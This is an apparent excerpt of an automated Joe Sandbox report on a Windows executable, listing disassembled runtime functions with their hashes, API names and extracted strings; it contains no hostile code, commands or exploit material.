                                                              • Opcode ID: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
                                                              • Instruction ID: 6e4fc18ec32506725c517572023f850b7cb6299b425e65a03e800070ac70ddf2
                                                              • Opcode Fuzzy Hash: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
                                                              • Instruction Fuzzy Hash: D111F720E6C20742FB68E33559551BA22925F8E378E184734D93ECA2F6FD2DB841CA42
                                                              Function 00007FF6FB1F52B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: verbose
                                                              • API String ID: 3215553584-579935070
                                                              • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                              • Instruction ID: bdfad847e93d5349798945b1985aad539a6d5d686fa60a9bfdd12c3c223e011b
                                                              • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                              • Instruction Fuzzy Hash: 5A91AD32E08A4781E721DE29E45137D3691AB49B9CF884136DAAE863F5FE3CE445C310
                                                              Function 00007FF6FB1FEED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                              • API String ID: 3215553584-1196891531
                                                              • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                              • Instruction ID: 16fcf6c1c2939ae8973adc2449e308ef80cfa3d205bf8e4658ba90451dbd632a
                                                              • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                              • Instruction Fuzzy Hash: 1B818B72E0E203C5FB74CF29C15027927A2AB19B4CF558035DA3AD72E9FEADE905D601
                                                              Function 00007FF6FB1EC968 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 2395640692-1018135373
                                                              • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                              • Instruction ID: 7555ce8033bff93ce848f9201fb72d2c70babcad80ee5b57bb5a117864d3585a
                                                              • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                              • Instruction Fuzzy Hash: D9515F32F196438ADB14CB15E844A7D7791FB88B98F148131EA6987FE4FE79F8818700
                                                              Function 00007FF6FB1EE1F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              • Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                              • Instruction ID: e1f080a5e38b8d542ba4a18d8ea05712d3fa2e7b27fd4cc32a51703e8e7905ff
                                                              • Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                              • Instruction Fuzzy Hash: F8616433D0878685D761DB15E4407AEB7A0FB89B98F044225EBAD87BA5DF7CE194CB00
                                                              Function 00007FF6FB1EE5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                              • Instruction ID: a6c22ba9bb68c41f0de174055e8b82e1e5c9fb922441a5d797d154e7415f4d60
                                                              • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                              • Instruction Fuzzy Hash: 9E518D33E0824386EBA4CB21D04426E76A1EB5DB98F144135DA6D97FE5EFBCF8508B41
                                                              Function 00007FF6FB1E7530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF6FB1E324C,?,?,00007FF6FB1E3964), ref: 00007FF6FB1E7642
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory
                                                              • String ID: %.*s$%s%c$\
                                                              • API String ID: 4241100979-1685191245
                                                              • Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                              • Instruction ID: a68329dc8879b11a9db30ed83c52efd69019cf10e3089e6c2c5d6ba49b7c8718
                                                              • Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                              • Instruction Fuzzy Hash: 1F318221E19AC745FB21DB15E8107AE6254EB4CBE8F444231EA7D83BE9FF2CE2458700
                                                              Function 00007FF6FB1E2870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message$ByteCharMultiWide
                                                              • String ID: Error/warning (ANSI fallback)$Warning
                                                              • API String ID: 1878133881-2698358428
                                                              • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                              • Instruction ID: 3ed3cb0239aaeb0ff4cb6b4e2db05f74bcbd9ad01f1ac0e3bf737689f830a1be
                                                              • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                              • Instruction Fuzzy Hash: 18118172A28A4681EB20DB10F565BAD3364FB48B88F501135DA6D876A4EF3CE605C740
                                                              Function 00007FF6FB1E25F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message$ByteCharMultiWide
                                                              • String ID: Error$Error/warning (ANSI fallback)
                                                              • API String ID: 1878133881-653037927
                                                              • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                              • Instruction ID: 36a2b72a220d63366705eaaa16e71de296a558917ac96bff469b69b89cc2150d
                                                              • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                              • Instruction Fuzzy Hash: 9F118E72A28A8681EB20DB00F565BAD6364FB4CBC8F901135DA6D876A4EF3CE605C740
                                                              Function 00007FF6FB1FB8B0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 2718003287-0
                                                              • Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                              • Instruction ID: e1affca7c548a8535667676dbf827b4e72c6a21703a0f50ba228eded790927d1
                                                              • Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                              • Instruction Fuzzy Hash: C3D1D176F08A8289E721CF69D5402AD37B1FB487D8B144235CE6E97BE9EE38D516C300
                                                              Function 00007FF6FB1FEC9C Relevance: 6.2, APIs: 4, Instructions: 161COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _get_daylight$_isindst
                                                              • String ID:
                                                              • API String ID: 4170891091-0
                                                              • Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                              • Instruction ID: f31c59562f08633a2d07bf4b1870bca487197d7c11490e07d701de2be24666c6
                                                              • Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                              • Instruction Fuzzy Hash: 8A51E573F041138AEB14DF64A9956BD27A2AB5839DF540135DD2ED2AF6EF38A501C700
                                                              Function 00007FF6FB1F4A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                              • String ID:
                                                              • API String ID: 2780335769-0
                                                              • Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                              • Instruction ID: 4ec867d2007e2f41d018b0819f3d7f61bae324759b9f82f4574747d48d87c50b
                                                              • Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                              • Instruction Fuzzy Hash: 35516822E086428AFB24DF7194503BD23A1AF4CB9CF149535DE29C76A9EF38D5A1C740
                                                              Function 00007FF6FB1E2030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$DialogInvalidateRect
                                                              • String ID:
                                                              • API String ID: 1956198572-0
                                                              • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                              • Instruction ID: 59bb9a2abd7cb7dc067461ba02fc92d881dd4d05ad8528567b615fd358c1a378
                                                              • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                              • Instruction Fuzzy Hash: 1A11C631E0814342FB64EB6AE55827D1291EF8CBC4F949031DA6987FEAED2CF4C18640
                                                              Function 00007FF6FB204E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                              • String ID: ?
                                                              • API String ID: 1286766494-1684325040
                                                              • Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                              • Instruction ID: 11d8f06991529424cd6897463360c2c90a14e325b5a542a2007728b21feedea8
                                                              • Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                              • Instruction Fuzzy Hash: 88412A12A0828345FB249B25D5253795660EF987E4F109235EE7CC6AF5FF3CD541C700
                                                              Function 00007FF6FB1F832C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB1F835E
                                                                • Part of subcall function 00007FF6FB1F9C58: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C6E
                                                                • Part of subcall function 00007FF6FB1F9C58: GetLastError.KERNEL32(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C78
                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6FB1EBEC5), ref: 00007FF6FB1F837C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread_invalid_parameter_noinfo
                                                              • String ID: C:\Users\user\Desktop\e45AiBoV6X.exe
                                                              • API String ID: 2553983749-3551109972
                                                              • Opcode ID: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                              • Instruction ID: 10b7e5f03b503dde526c9d0b3b79f6bc87970166dcc8d70c70fc678bf12099f0
                                                              • Opcode Fuzzy Hash: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                              • Instruction Fuzzy Hash: C0416C36E08A53C5EB18DF25E9811BC27A4EB497D8B555035EA6EC7BE5EE3CE481C300
                                                              Function 00007FF6FB1FF8E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                              • String ID: .$:
                                                              • API String ID: 2020911589-4202072812
                                                              • Opcode ID: a7e7ecf8ca197d948e5de4d949c192756b769c590a90378fa45037ccdac380fb
                                                              • Instruction ID: 751dcc1dd1b5525232542b870e70bda81a8fe4585af1ea3eb1b8886e7e3f7060
                                                              • Opcode Fuzzy Hash: a7e7ecf8ca197d948e5de4d949c192756b769c590a90378fa45037ccdac380fb
                                                              • Instruction Fuzzy Hash: EA414A22E0965398FB10DBA198611BC27B4BF1875CF540039EE6DA7AE9EF78A456C300
                                                              Function 00007FF6FB1FBF48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                              • Instruction ID: 8578bb5448fca6d6b7ca3f789977a7d2209c012eeacf791fba62aa5c6ae5ebc4
                                                              • Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                              • Instruction Fuzzy Hash: 8541B322A18A8681DB20DF25E4447BA6760FB8C798F944131EE5DC7BE8EF3CD441CB40
                                                              Function 00007FF6FB1FE8C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID: :
                                                              • API String ID: 1611563598-336475711
